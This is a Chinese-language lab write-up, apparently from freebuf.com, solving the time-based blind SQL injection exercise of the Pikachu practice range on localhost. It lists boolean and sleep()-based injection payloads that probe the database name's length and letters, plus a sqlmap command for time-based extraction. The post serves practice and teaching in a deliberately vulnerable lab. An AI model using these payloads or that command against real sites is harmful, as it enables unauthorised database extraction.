pikachu靶场-Sql Inject(SQL注入)-基于时间的盲注 – 作者:知非知非知非

1627258483_60fdfe73c2dc6648430f5.png!small

感觉这块,作者偷懒了,因为这个提示没啥用!!!

1627258488_60fdfe786731a6f7474c3.png!small

我们试一下,把上题中的PAYLOAD放在这里试试!!

PAYLOAD信息为:

kobe ‘ and ascii(substr(database(),1,1))=112#’

//数据库第一个字母的acsii码是112,即p

kobe’  and length(database())=7#’

//数据库的长度为7

1627258498_60fdfe827d0be9d29b74b.png!small

1627258504_60fdfe884a4d8f4ee7d8d.png!small

1627258511_60fdfe8f6b7d56c21c61e.png!small

1627258516_60fdfe94f2b527f64d194.png!small

这下好了,二选一的回显也没了!!!!

好吧,我们来构造PAYLOAD,基于等待时间执行!!!

kobe’ and if (length(database())>5,sleep(5),null)#’

1627258524_60fdfe9c120007d804978.png!small

可见耗时为7秒以上!!!

1627258530_60fdfea2eb2d59e0d58f9.png!small

kobe’ and if (length(database())>10,sleep(5),null)#’

1627258536_60fdfea8cab499cf179e7.png!small

可见耗时只有2秒!!!

1627258542_60fdfeaec5677dfd3d03d.png!small

这个一对比,就可以判断出数据库名称的长度,更换方法进而可以判断出数据库的名称等进一步的信息!!!!

不过,还是这样,这个其实也是通过SQLMAP实现的,请看下方!!!

python sqlmap.py -u “http://localhost/pikachu/vul/sqli/sqli_blind_t.php?name=kobe&submit=%E6%9F%A5%E8%AF%A2” –technique=T –current-db

等待回显!!!!

1627258549_60fdfeb5b706a5b0acbe1.png!small

来源:freebuf.com 2021-07-26 08:16:40 by: 知非知非知非

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论